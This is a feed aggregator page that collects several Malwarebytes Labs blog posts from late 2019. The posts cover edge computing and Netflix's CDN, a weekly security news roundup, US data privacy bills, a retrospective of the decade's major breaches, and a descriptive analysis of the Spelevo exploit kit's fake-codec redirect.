  • Private: Cloud services are delivered over the business network from the owner’s data center. You have control over the hardware, as well as the management and related costs.
  • Hybrid: A mix of the above. Businesses can choose to have control over the most sensitive data, and use public services to cover the rest of their needs.

Edge computing would likely employ the hybrid solution with a distributed cloud platform, which means that the cloud resources are placed strategically to provide the locations that have the highest demands with the highest level of resources.

Netflix: a special case

Considering edge computing’s applications, you might be inclined to envision streaming video services as beneficiaries. That might be so one day, but right now, the biggest name in the game, Netflix, has achieved fast-loading viewing times to millions at once without going to the edge.

Netflix has grown to serve over 50 million subscribers in 40 countries. To optimize the user experience, Netflix has taken online video streaming to the next level by building their own CDN, partnering with ISPs in the serviced countries, and developing a system that adapts the quality (resolution) of the content to the latency of the users’ connection. They are not employing edge computing techniques because they built their own infrastructure.

What this means in practice is that Netflix works directly with the ISPs by installing boxes called Open Connect Appliances either at exchange points or within the ISPs. These boxes can hold up to 280 Terabytes of video, which contains everything Netflix has to offer in your neck of the woods.

This actually means that in most cases, you are connecting to Netflix with your own ISP, provided they are one of Netflix’s partners, which results in maximum speed and low latency. As an extra method of avoiding noticeable buffering, Netflix can lower the image quality, which results in less pixels being sent.

Edge computing

The goal of edge computing is to achieve the resolution, speed, and ease of access that Netflix offers us, but without having to make the huge investments in infrastructure. The trick is to create a mix of hardware solutions and distributed cloud resources that can be deployed so that every endpoint user has the impression they are working locally.

When looking for an edge computing solution, it is imperative to know whether demand will remain more or less distributed in the same way or whether we need more flexibility when it comes to peak usage taking place in different locations.

To keep the mix of resources in sync with any shifts in demand by size and location, we will need some software solution to keep track of the demand and adjust the settings to meet the set parameters—preferably one that informs us beforehand when the limits of what it can achieve are getting close to the borders of what we have indicated to be acceptable.

This way, we can make informed decisions about whether we need to expand in hardware, shell out more for cloud services, or start looking for a better management software.

Security in edge computing

As per usual in quickly-evolving fields, edge computing runs the risk of deploying security measures as an afterthought. It’s nice when our employees in remote offices can participate as if they were next-door, but not at the cost of leaking business information along the lines of communication or at the edges of our corporate network.

Assuming you have security within your own network perimeters in order, the next logical step would be to lock down the pathway of information to and from the cloud, as well as the data stored in the cloud—all has to be done without a noticeable impact on the latency.

As the increased speed of communication was the goal we set out to achieve, it is convenient to forget we need to check what goes out and what comes back in. But neglecting these checks might turn the devices at the edge into open doors into your infrastructure. On the plus side, in edge computing, the devices at the perimeter only get what they need by design, and that limits the chance of any threat actor retrieving a complete set of data from one device.

The future of edge computing

With 5G on the horizon and artificial intelligence ready to orchestrate resources, we see a bright future for edge computing. The latency times might even be adequate enough to conquer the gaming industry. Looking at the pile of plastic in my closet, it occurs to me that this will be better for the planet as well.

The post Explained: edge computing appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (December 23 – 29)

Malwarebytes - Mon, 12/30/2019 - 16:55

Last week on Malwarebytes Labs, we continued our retrospective coverage with a look at how lawmakers in the United States treated online privacy this year, finding trends in multiple federal bills introduced in the Senate. Then we took a little break for the holidays.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (December 23 – 29) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Online privacy in 2019: a legislative review

Malwarebytes - Mon, 12/23/2019 - 17:41

For decades, the United States treated data privacy like an aging home, patching individual leaks and drafts only when a new storm hit. The country passed a law protecting healthcare-related information, and not much else. It then passed a law protecting video rental information, and not much else. It continued this way, repeatedly passing sector-specific laws while failing to address a problem that, in the past two years, became impossible to ignore.

Data privacy, as protected by law, is broken.

Americans enjoy no federal rights to access their data, correct their data, easily move their data from one company to another, or individually sue a company that invades their private lives online.

Harmed by the Equifax breach? Good luck getting more than literal pennies in the settlement. Shocked that a company shared menstrual tracking info with Facebook? Oh, well. Want to fight back against invasive online trackers? Your options are limited.

Since mid-2018, several US Senators have sought to fix these types of failures, introducing at least nine bills—with six introduced in 2019 alone—to provide comprehensive data privacy protections to every American.

With so many bills, what’s the hold up on getting them passed?

For starters, installing comprehensive data privacy protections is long, complex work—the European Union spent more than five years drafting its own data privacy law, the General Data Protection Regulation (GDPR), and even after the EU approved the law, another two years passed before it took effect. Further, you could say that Congress is a little, um, busy as of late.

Finally, though every bill may focus on data privacy as an end goal, many disagree with how to get there.

One data privacy bill simply aims to stamp out legalese-infused end-user agreements. Another data privacy bill seeks to grant similar protections as those afforded in GDPR, like the rights to access, correct, and delete personal data. One proposal tries to stop invasive online tracking and data-sharing practices. The same proposal argues that dishonest tech CEOs should be jailed. Still more bills offer ideas like data ownership, data valuation, and something called “interoperability,” which, in a perfect world, would let individuals talk to their friends on Facebook without actually needing a Facebook account.

In combing through the many federal and state data privacy bills that emerged this year, we found some similarities. Here is a look at the legislative trends in data privacy for 2019.

Data as property

In November, one Democratic presidential hopeful latched onto a data privacy idea that has been around for at least six years: Paying people for their data.

If data is more valuable than oil, as the candidate said, then shouldn’t the people who produce that data get paid for it? Shouldn’t Americans be compensated for their most valuable asset in today’s data-driven economy?

This is the “data as property” model, and supporters of it argue that, by giving individuals the right to their own data, they can then control how their data is collected, shared, and sold. No more surprise data-sharing between one company and another. No more GPS location data falling into the hands of literal bounty hunters. (Unless, of course, that’s what you want.) And, perhaps most importantly, no more companies making it rich without consumers getting at least a little cut of the profit.

Under a “data as property model,” supporters believe that every day consumers could receive steady, passive income by selling their data on their own terms. Not only that, but data could be sold repeatedly, as it potentially maintains its value even after being sold.

Earlier this year, US Senators Mark Warner of Virginia and Josh Hawley of Missouri hinted at this possible future with their bill, the Designing Accounting Safeguards to Help Broaden Oversight And Regulations on Data, or DASHBOARD, Act.

The DASHBOARD Act would require certain companies to assess and disclose the value of users’ data, while also extending data privacy rights to consumers to delete all, or certain fields, of collected data.

But privacy advocates argue that putting a price tag on data—a process that is neither science or art—only normalizes the idea that our data privacy can be bought. Once that type of relationship is codified into law, the potential risks would disproportionately harm low-income, struggling communities, said Chad Marlow, senior advocacy and policy counsel at ACLU.

“If you have parents who are struggling to put food on the table—who are eating bread and drinking water for multiple dinners—and you say ‘I will give you money if you sell your data’ and you don’t even say how much, they will say yes immediately,” Marlow said. “Because they cannot afford to say no.”

This is the “pay-for-privacy” problem. It showed up a few times this year.


In November 2018, Democratic Senator Ron Wyden introduced the “Consumer Data Protection Act,” a draft proposal that would have empowered American consumers to opt-out of having their data shared with multiple third parties. Unfortunately, according to the proposal, that decision could sometimes come with a price.

As Malwarebytes Labs explained earlier this year, this is how proposal would have worked:

“Say a user, Alice, no longer feels comfortable having companies collect, share, and sell her personal information to third parties for the purpose of targeted ads and increased corporate revenue. First, Alice would register with the Federal Trade Commission’s ‘Do Not Track’ website, where she would choose to opt-out of online tracking. Then, online companies with which Alice interacts would be required to check Alice’s ‘Do Not Track’ status.

“If a company sees that Alice has opted out of online tracking, that company is barred from sharing her information with third parties and from following her online to build and sell a profile of her Internet activity. Companies that are run almost entirely on user data—including Facebook, Amazon, Google, Uber, Fitbit, Spotify, and Tinder—would need to heed users’ individual decisions. However, those same companies could present Alice with a difficult choice: She can continue to use their services, free of online tracking, so long as she pays a price.

“This represents a literal price for privacy.”

Nearly one year after Sen. Wyden introduced this draft proposal, he formally introduced the “Mind Your Own Business Act” before the US Senate with many of the same ideas—including the same pay-for-privacy scheme.

The problems with pay-for-privacy schemes are the same with the “data as property” model—the individuals most able to assert their data privacy rights will be those who can literally afford it. If such models move forward, we risk creating a world of the “privacy-have” and “have-nots”—a mirrored image of the already visible socioeconomic striation in America.

These concerns are not hypothetical.

In 2015, AT&T offered a broadband service package with a $30-a-month discount so long as users agreed to have their Internet activity tracked. That type of browsing activity, AT&T said, included “the webpages you visit, the time you spend on each, the links and or ads you see and follow, and the search terms you enter.”

Privacy is a human right, and online privacy should be no exception. That means no commodity pricing, and no selling it to the highest bidder.

Thankfully, at least one state this year passed a law that explicitly forbid pay-for-privacy schemes.

Over the summer this year, the governor of Maine signed into law a bill that prohibits Internet Service Providers from sharing and selling Maine residents’ data without their explicit approval.

The law includes another protection that does not allow ISPs to “charge a customer a penalty or offer a customer a discount based on the customer’s decision to provide or not provide consent” to having their data sold, shared, or accessed by third parties.

Score one for data privacy.


In late October, three US Senators introduced a bill that they believed would increase data privacy by doing something else—increasing competition with Big Tech.

The idea, the Senators argued, was simple: Empower American consumers to leave the platforms that invade their online privacy without losing access to their social networks, where their friends, family, and acquaintances may still reside.

Under the proposal, Americans would enjoy the benefits of data portability—which would enable consumers to pack up their data and take it to another platform—and interoperability—a feature that would potentially allow different chat services to interact with one another. Think of it like Facebook’s massive integration plan announced earlier this year for its chat platforms Messenger, WhatsApp, and Instagram, but for nearly the entire Internet.

As we wrote before about this bill, called the ACCESS Act:

“These rules… would presumably allow Americans to, for example, download all their data from Facebook and move it to privacy-focused social network Ello. Or talk directly to Twitter users while using the San Francisco-based company’s smaller, decentralized competitor, Mastodon. Or even, perhaps, log into their Vimeo account to comment on YouTube videos.”

Responses to the bill were mixed.

Avery Gardiner, senior fellow of competition, data, and power for the Center for Democracy and Technology, lamented the lack of competition facing Big Tech, but she said that data privacy for Americans should come in a data privacy bill, not a competition bill.

Cory Doctorow, a writer, activist, and research affiliate with MIT Media Lab, welcomed the bill because, unlike other efforts in Congress, it did not focus strictly on single bad actors in Big Tech, like Facebook.

“This aims to fix the Internet,” Doctorow said, “so that Facebook’s behavior is no longer so standard.”

What’s next for 2020?

On January 1, 2020, California’s own privacy law, the California Consumer Privacy Act, takes effect. Passed in 2018, the law has survived multiple, legislative attempts to weaken and defang it, and it has inspired similar legislation in other states.

With the law’s enormous scope, it will likely serve as a trial run for any federal data privacy bill.

Will companies receive serious fines, or will enforcement be lax? What will the first enforcement action be? What company will it be against? If penalties are severe, at what point will companies bandy together to prevent similar legislation from passing at the federal level? Hint: They’re already trying.

None of this is to mention, of course, next year’s mindshare-absorbing presidential election, too.

Until then—and after it—Malwarebytes Labs will closely watch this space. We can only predict it will get more interesting, more complex, and more important.

The post Online privacy in 2019: a legislative review appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (December 16 – 22)

Malwarebytes - Mon, 12/23/2019 - 17:40

Last week on Malwarebytes Labs, we signalled that Mac threat detections have been on the rise in 2019, discussed how a new Consumer Online Privacy Rights Act (COPRA) would empower American users, warned that the Spelevo exploit kit debuts a new social engineering trick, and let our own Statler and Waldorf take you through a decade in cybersecurity fails: the top breaches, threats, and ‘whoopsies’ of the 2010s.

Other cybersecurity news
  • Much aligned with our own findings Amazon’s Ring security was found to be below par, awful even. (Source:
  • A Canadian clinical laboratory services provider has suffered a data breach that exposed sensitive information and admitted to paying the hackers to retrieve the stolen data. (Source: TechSpot)
  • 22-year old Londoner Kerem Albayrak was sentenced after attempting to blackmail Apple by threatening to factory reset 319 million iCloud accounts and selling the users’ data. (Source: BleepingComputer)
  • Hackensack Meridian Health paid an undisclosed amount in ransom to stop a cyber-attack that has disrupted the hospital owner’s computer network. (Source:
  • If you stopped at a Wawa mini mart recently, your payment card details may have been snatched. (Source: TheVerge)
  • Contractor admits planting logic bombs in his software to ensure he would get new work. (Source: ArsTechnica)
  • Frankfurt, one of the largest financial hubs in the world had to shut down its IT network following an infection with the Emotet malware. (Source: ZDNet)
  • The Maze ransomware gang started a campaign to pressure victims into paying ransom by publicly listing successful attacks and threatening to leak data. (Source: TechTarget)
  • Every minute of every day, everywhere on the planet, dozens of companies are logging the movements of millions of people with mobile phones and storing the information in gigantic data files. (Source: The New York Times)
  • A United Kingdom national appeared today in federal court on charges related to his role in a computer hacking collective known as The Dark Overlord. (Source: Department of Justice)

Stay safe, everyone!

The post A week in security (December 16 – 22) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A decade in cybersecurity fails: the top breaches, threats, and ‘whoopsies’ of the 2010s

Malwarebytes - Thu, 12/19/2019 - 18:03

This post was co-authored by Wendy Zamora and Chris Boyd. All opinions expressed belong to your mom.

Back in the days before climate change stretched frigid winter months directly into the insta-sweat of summer, there was a saying about March: in like a lamb, out like a lion. The same might be said about the last decade in cybersecurity fails.

What kicked off with a handful of stories about niche hacks ballooned into daily splashy headlines about massive data breaches, dangerous outbreaks, and increasingly sophisticated attack campaigns. The game has truly changed, generating a multi-billion-dollar industrial complex, and inspiring millions to stock up on tinfoil hats while saving trendy rumpus room designs to their Pinterest boards.

To comment on the sweeping changes brought on by the last 10 years of hacks, breaches, privacy debates, and evolutions in malware, Malwarebytes researchers Wendy Zamora and Chris Boyd take a look at the most noteworthy, mind-blowing, and sometimes chuckle-inducing cybersecurity fails that defined the decade.

2011: Game over, PlayStation

WZ: It all started with the gamers. In my mind, gaming is nearly as genre-defining as porn when it comes to testing, adopting, and embracing early tech evolutions. The two go hand-in-hand, so to speak.

I’ll just give you a minute to wipe that last image out of your head before proceeding.

Great. So, in 2011 the world got its first glimpse at the power of a good hack to not only steal data, but also bring operations to a grinding halt. The 77 million members of the Sony PlayStation Network, including minors under the age of 18, had their personal data exposed to hackers. But worse for the gamers, they were locked out of their accounts for 23 days, unable to play online, purchase, or otherwise indulge in their favorite pastime.

For the sheer number of users alone, this hack is noteworthy, but more, it was a foreshadowing of the ways in which cybersecurity fails could do more than just steal information—they could disrupt lives.

2012: Mat Honan’s digital life torched

CB: PlayStation was significant for sheer cultural impact, if not actual affected numbers, given the size of recent breaches. I usually groan when looking at yearly lists of cybersecurity fails because I know 90 percent of it is going to be the same generic breach we’ve all seen a hundred times over. Yes, it’s bad that six million customer records were swiped from a web-facing database. No, it doesn’t make for interesting reading.

Instead, I’m much more interested in specific examples of personal ruination. One such example is from 2012, when technology writer Mat Honan found his entire digital world torn in half. I’d argue this is one of the most spectacular digital demolition jobs I’ve ever seen. The crooks had no interest in him, his data, or his devices. They just wanted that sweet, sweet three-character Twitter handle. If everything important to him was torched along the way? Too bad, so sad.

This guy pretty much lost everything of real, singular importance to him in the attack. All those photos of his kid as a baby? Bam, gone. Google account taken over and deleted. iPhone and iPad data erased. Anything still on his MacBook drive was locked away behind features designed to make his life more secure, like the four-digit PIN. The worst feeling in the world isn’t just the compromise; it’s knowing that those helpful systems are a gigantic pain in the backside once someone who isn’t you is in the driving seat.

Some basic actions—enabling 2FA on gmail and making backups—would have essentially made this a non-event. Did Honan miraculously manage to get his photographs back? Sure. It was a lucky escape, and we generally don’t get that lucky. This was one of those landmark, hot knife through buttery cybersecurity fails. I double dare you to top it.

2013: Snowed under

WZ: Sure, sure, Honan’s digital demise uncovered many holes in security processes we previously thought were failsafe, and maybe taught Apple customer service a valuable lesson in active listening. But as you yourself noted—I don’t think anyone learned anything from it. In contrast, Edward Snowden jolted the world out of its collective ostrich pose and demonstrated how very much 1984 got it right.

Depending on which side of democracy you stand on, Snowden, a former CIA contractor-turned-whistleblower, is either a hero or a war criminal for his 2013 revelations about the extent and reach of NSA-sponsored surveillance systems set up in the aftermath of 9/11. Global telecommunications systems, Internet watch lists, international cooperation, the works. In the list of cybersecurity fails, this may be the Holy Grail.

Regardless of political stance, Snowden’s reveal was a real eye-opener for the public, and it sparked a massive worldwide debate that rages on to this day. They call it “the Snowden effect.”

Just ask anyone what’s more important to them: national security or personal privacy? Do they have “nothing to hide” or is their right to stay off the grid of upmost importance? If you can easily answer this question and guarantee everyone in the room with you agrees, then you must be reading this from far in the future, when this list will look positively quaint in comparison to yours.

2013: Cryptolocker ransomware changes the game

CB: Okay, Snowden is a double-edged sword. On the one hand, he helped confirm that those conspiracy theorists were onto something. On the other hand, he helped confirm that those conspiracy theorists were onto something. I also wonder if the significance of his findings made that much of an impact outside the US, considering lots of folks just shrugged and carried on regardless.

If you want actual global impact on a scale you can feel, ransomware is where it’s at. Cryptolocker ransomware, specifically.

Ransomware was all fun and games until Cryptolocker came onto the scene and dashed users’ hopes by being the first widespread malware to encrypt files and hold them hostage until ransom was paid. Ransomware prior to Cryptolocker mostly relied on cheap tricks instead of encryption, but its arrival in 2013 cemented this method’s popularity forever, spawning clones and higher encryption stakes by the bucketload.

2013 again: Target hack

WZ: Okay, I will totally give you Cryptolocker. Game changer, no question. But this next breach is the quintessential lesson in “it only takes one time,” the Occam’s razor of cybersecurity fails. It also happened to be the splashiest, loudest security news of the decade (so far). Why? Because everyone loves Target. Everyone.

In 2013, Target screwed up big time. Its HVAC vendor had been hit with malware via lowly phishing email, but the technician remained dubiously unaware of that infection, which went ahead and stole Target’s network credentials. Hey, kids! What happens when you give third parties access to your VPN without thoroughly vetting them or their equipment for threats? You get hacked.

Also, note to businesses of all sizes: Free scanners do not proactively block threats. (Yes, we know, the HVAC people were using the free version of Malwarebytes.) They detect and clean malware only when you run a scan. Had the vendor been using our real-time anti-malware technology (or any other antivirus platform with always-on protection), this attack would have been erased from history.

2014: sorry, celebs! The Sony Pictures hack

CB: Everyone may love Target in the US, but on the other side of the pond, we enjoy £1 stores where everything costs, uh, £1.50. No, I don’t understand it either. What I do understand is I’m about to up the stakes to DEFCON 1 (Is that the bad one?) with a hacking tale that truly went viral. Step forward for the second time today, Sony!

The long version of the Sony Pictures hack can be read here. The short version? A hacker group called Guardians of Peace pilfered massive amounts of data from Sony servers, and in the years that have followed, it’s now tricky to remember where conspiracy theories and documented facts cross paths. A shady North Korean conspiracy, FBI and NSA involvement, multiple unreleased movies dumped online, thinly-veiled references to terrorist acts unless The Interview was pulled from theatres, and more all happened in the space of a month.

This cybersecurity fail is the equivalent of a Fast and Furious movie where the smalltime family of car heisters somehow ends up stealing nuclear footballs and taking down Russian submarines in their spare time. Also, hurling insults at someone who starred in a film called Hackers seems like a great way to invoke the Gods of dramatic irony.

2015: not sorry, cheaters

WZ: Yikes, yeah, 2014 was not a great year to be a celebrity. Just ask the victims of The Fappening. But I’m going to pivot and mention one of the decade’s cybersecurity fails that was actually a good thing: The Ashley Madison hack.

Bringing to public conscious the term “hacktivism,” these do-gooders breached the database of the website dedicated to helping married people find true love by cheating on their partners. Some 32 million adulterers’ credentials and credit card information were dumped online, after which they were likely dumped by their angry spouses. There’s not much else I can say here except you guys are assholes and deserved this one. The end.

CB: Yeah, I got nothing. Those cheaters were bad and should feel bad.

2016: But her emails?

WZ: Look, everyone and their mother is going to say the DNC hack was the biggest cyber event of 2016. The Russians most certainly pinned the tail on the Democratic donkey, interfered in our elections, and overall made a right mess of things. There’s no doubt Russia’s actions cast a shadow over American democracy. But as far as global, far-reaching impact is concerned, I’ve got my eye on a different blight.

In 2016, a shady hacking group known as the Shadow Brokers started leaking NSA secrets, vulnerabilities, and exploits onto the Internet, embarrassing the agency, but more importantly, putting sophisticated tools in the hands of cybercriminals that would be employed over the remainder of the decade.

Most notably, they disclosed a group of SMB vulnerabilities and their accompanying exploits, which were later used to propagate the WannaCry infection laterally through thousands of endpoints, and which are still in use today to spread deadly Emotet and TrickBot infections in worm-like fashion.

If it weren’t for the cybersecurity fails caused by the Shadow Brokers, who knows? Threat actors might still be messing around with small potato consumer scams and identity theft. But with grown-up utilities in hand, they realized they could do a lot more damage to a lot more devices, and soon turned their greedy gaze to loftier goals.

2017: the year of the outbreak

CB: Well, super sneaky government tool thefts are all well and good, but the impact of ransomware retooling and running wild can’t be denied. In 2017, ransomware authors decided that just going after home users was becoming a little old hat, so they started targeting large organisations in a wave of outbreaks (fueled by the very exploits stolen from the NSA in 2016). Sadly for us, those organisations included many of the services we make use of on a daily basis, whose files and operations were encrypted and held up for Bitcoin ransom.

WannaCry, NotPetya, and BadRabbit were the big three ransomware epidemics of the year, but the malware made headlines time and time again as ransomware authors inched themselves into every available corner. Threat actors may have become a little less inventive during this period, but they certainly weren’t resting on their laurels.

Arguably the heaviest-hitting ransomware story of 2017 was the WannaCry attack on NHS, as £92m vanished down the plughole. This was a seismic attack, the aftershocks of which are still felt today, spinning off into unexpected places that have taken on a life of their own.

2017: crypto fever

WZ: I could go with Equifax here, but come on, son. Another day, another breach. In 2017, it was safe to say that basically anyone who had ever been online had their information compromised. Which is why I will instead turn to the birth of a brand-new form of cybercrime: cryptomining.

Bitcoin and other cryptocurrency had always been the favored tender of the black market, as it’s anonymous and nearly impossible to trace. However, in 2017, crypto became more mainstream as a sudden, acute increase in value had even the beariest of bears opening cryptowallets and investing in super-niche altcoins. So naturally, cybercriminals being the vultures of the Internet, they found a way to capitalize on all this carrion by jacking the CPU/GPU of other users’ systems to generate coin.

Starting in late 2017, we started noticing hundreds of millions of detections of, a CPU-mining platform that—while itself was a legitimate service—was being abused by cybercriminals to mine users without their permission. This kicked off a landslide of cryptomining activity that spawned the creation of multi-platform cryptomining malware, drive-by mining attacks, crypto-bundlers, crypto-themed scams, cryptowallet drainers, crypto crypto cryptors, and crypto.

While cryptomining has since died down from its 2017-2018 heyday, it remains forever part of the threat landscape, and I’m sure we’ll be seeing much more of it as cryptocurrency and blockchain technology take hold in the next decade.

2018: shine’s off social media

CB: 2018 was all about the covert use of data pulling the strings in every direction you can imagine. Data mining and digital assets plus social media makes for a cracking combination in the wrong hands, and it turns out Facebook was the place most of this war was fought and won (or lost, if you were on the receiving end).

Cambridge Analytica, a political consulting firm based in the UK, probably knew they’d walked into “oh, whoops” territory when their offices were raided in 2018. They’d been mucking around on multiple elections worldwide, but drew attention to themselves and Facebook after it was discovered that they’d been harvesting the personal information from 50 million Facebook user profiles without their permission. The repercussions from this story continue to be felt today, as lawmakers now scrutinize Big Tech for their data privacy policies.

2018: data privacy becomes a thing

WZ: Actually, I have to semi-agree on Cambridge Analytica. But I see your social media problems and I raise you an entire Internet of data privacy issues. In 2018, users got a rude awakening into the inner workings of the tech giants they’d come to love, rely on, and otherwise be addicted to. Wait, you’re selling my information to pharmaceutical companies? You can actually record my conversations through my digital home assistant? Suddenly, users had to be just as wary of legitimate tech companies as they were of cybercriminals.

The awareness of 2018 led to global action, as GDPR was put into effect, launching a million cookie notices and EULA rewrites. Digital data privacy had always been an issue, reaching far back to pre-Y2K years, and it will continue for many decades as we contend with biometrics and genetic data. But 2018 represented a period of public “wokeness” that forever changed the way we build, buy, regulate, and use technology.

2019: the year of the triple threat

CB: We’re too close to 2019 to be able to say conclusively what stuck and what stank, but the triple threat of Emotet, TrickBot, and Ryuk ransomware caused such massive problems across a range of critical infrastructure and business services that any 2019 listicle that doesn’t feature this attack is missing the mark. If your mailbox hasn’t detected the familiar twang of an Emotet malspam landing on the network yet, you’re doing very well indeed.

The triple threat officially saw light in 2018, but it was the attack of 2019. If there was news of a city declaring a state of emergency, a school shutting down for weeks, or a hospital shelling out thousands in ransom payment, you bet it was on account of these three devils. It’s an assault from every angle, and in an alien invasion, this would be the part where the hero escaped through a conveniently placed air vent.

Cybersecurity fail of the decade

All this arguing on which cybersecurity fails were most awe-inspiring, death-defying, or just plain stupid would be pointless if we didn’t wrap it up in a nice year-end bow. So, without further ado, we’ll now take our pick of the top cybersecurity fail of the decade. Drumroll please…

WZ: My vote is for Shadow Brokers because it set off a chain of events that allowed for cybercriminals to evolve into more sophisticated, industrialized players, essentially radically changing the threat landscape from a bunch of kids messing around in their basements to organized criminals aimed at taking down organizations, swiping millions of users’ personal data and making significant profit in the process.

CB: My pick is the Mat Honan hack. It’s not as big, or as flashy, or as sophisticated as most of the attacks on display. But what happened to him pretty much still happens to people now as their first introduction to the world of “All my data is gone forever.” How they torched his digital existence and salted the earth is beyond brutal—and, most chillingly, it was nothing personal.

Which of these cybersecurity fails would you vote for? Sound off in the comments!

The post A decade in cybersecurity fails: the top breaches, threats, and ‘whoopsies’ of the 2010s appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Spelevo exploit kit debuts new social engineering trick

Malwarebytes - Wed, 12/18/2019 - 16:00

2019 has been a busy year for exploit kits, despite the fact that they haven’t been considered a potent threat vector for years, especially on the consumer side. This time, we discovered the Spelevo exploit kit with its virtual pants down, attempting to capitalize on the popularity of adult websites to compromise more devices.

The current Chromium-dominated browser market share favors social engineering attacks and other threats that do not require the use of exploits in order to infect users. However, we continue to see malvertising campaigns pushing drive-by downloads in our telemetry. The malicious adverts are placed on tier 2 adult websites that still drive a lot of traffic.

Recently, we captured an unusual change with the Spelevo exploit kit where, after an attempt to trigger vulnerabilities in Internet Explorer and Flash Player, users were immediately redirected to a decoy adult site.

Figure 1: Exploit kit used in tandem with social engineering

Spelevo EK instructs the browser to load this site, which social engineers victims into installing a video codec in order to play a movie. This appears to be an effort from the Spelevo EK operator to double his chances of compromising new machines.

Spelevo EK changes its redirection URL

Based on our telemetry, there are a few campaigns run by threat actors converting traffic to adult sites into malware loads. In one campaign, we saw a malvertising attack on a site that draws close to 50 million visitors a month.

Figure 2: Traffic view from EK to soc. engineering site

We collected two main payloads coming directly from Spelevo EK:

  • Ursnif/Gozi
  • Qbot/Qakbot

One thing that Spelevo EK did which was a little bit different from other exploit kits is redirect victims to post exploitation, typically after a 10-second delay:

Figure 3: Google redirect with 10 second delay

However, in this latest capture, we noticed that the script had been edited and that the time was increased to 60 seconds:

Figure 4: Google redirect with 60 second delay

This change is important because it allows enough time for the exploit kit to run all the way and call the last URL part of the EK framework. Here, we noticed something new as well.

Previously, the URL immediately following the payload had the following ending pattern: &00000111&11. Now, the new pattern is 32 characters followed by the letter ‘n’.

Figure 5: Redirection from EK to decoy adult site

Before the refresh tag comes into effect, the browser is redirected to a new location, which happens to be a decoy adult site.

Social engineering as backup

There is nothing special about this fake adult site, but it works really well in the context of the malvertising chain. Victims were already engaged with the content and may not even realize that an exploitation attempt just happened.

Figure 6: Fake adult site tricking users with fake video codec

This time around, the site urges users to download a file called lookatmyplayer_codec.exe. Downloading video codecs to view media used to be fairly common back in the day, but isn’t really the case anymore. Yet, this kind of trick still works quite well and is an alternative method to compromise users.

The fake codec turns out to be Qbot/Qakbot, which is also one of the payloads distributed by Spelevo EK. In other words, the threat actor has two chances to infect victims: either via the exploit kit or fake codec.

This is not the first time that exploit kit operators have included social engineering schemes. In 2017, Magnitude EK was seen pushing a fake Windows Defender notification, while Disdain EK was tricking users with a fake Flash Player update.

Malwarebytes users are protected against both the exploit kit and payloads.

Indicators of compromise (IOCs)





Decoy adult site


The post Spelevo exploit kit debuts new social engineering trick appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds